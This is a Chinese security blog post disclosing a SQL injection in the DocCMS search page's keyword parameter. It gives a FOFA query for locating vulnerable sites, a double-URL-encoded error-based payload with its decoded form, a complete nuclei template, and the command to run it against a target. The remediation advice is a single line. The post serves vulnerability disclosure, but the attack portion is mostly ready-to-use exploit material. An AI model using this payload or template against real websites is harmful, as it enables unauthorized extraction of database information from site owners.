DocCMS keyword SQL注入漏洞(附POC)

admin 2024年2月19日14:13:04评论169 views字数 2112阅读7分2秒阅读模式

使

01

漏洞名称

DocCMS keyword SQL注入漏洞

02

漏洞影响

DocCMS 创建的网站

DocCMS keyword SQL注入漏洞(附POC)

03

漏洞描述

DocCms[音译:稻壳Cms] ,定位于为企业、站长、开发者、网络公司、VI策划设计公司、SEO推广营销公司、网站初学者等用户 量身打造的一款全新企业建站、内容管理系统,服务于企业品牌信息化建设,也适应用个人、门户网站建设!Doccms存在SQL注入漏洞,攻击者可利用漏洞获取数据库敏感信息。

04

FOFA搜索语句
app="Doccms"

DocCMS keyword SQL注入漏洞(附POC)

05

漏洞复现

poc如下

/search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33

其中payload为下列语句的二次Url编码

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

使用浏览器访问,会在网站上方出现报错

DocCMS keyword SQL注入漏洞(附POC)

06

nuclei poc

id: doccms-keyword-sqliinfo:  name: DocCMS keyword SQL注入漏洞  author: fgz  severity: critical  description: DocCms[音译:稻壳Cms] ,定位于为企业、站长、开发者、网络公司、VI策划设计公司、SEO推广营销公司、网站初学者等用户 量身打造的一款全新企业建站、内容管理系统,服务于企业品牌信息化建设,也适应用个人、门户网站建设!Doccms存在SQL注入漏洞,攻击者可利用漏洞获取数据库敏感信息。  reference:    - none  metadata:    fofa-query: app="Doccms"    veified: true  tags: sqli,DocCMShttp:  - method: GET    path:      - "{{BaseURL}}/search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33"    matchers-condition: and    matchers:      - type: status        status:          - 200      - type: word        part: body        words:          - '数据库错误:'          - 'XPATH syntax error:'        condition: and

运行POC

 .nuclei.exe -t .doccms-keyword-sqli.yaml -u  http://www.xx.cn

DocCMS keyword SQL注入漏洞(附POC)

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):DocCMS keyword SQL注入漏洞(附POC)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月19日14:13:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DocCMS keyword SQL注入漏洞(附POC)https://cn-sec.com/archives/2123673.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息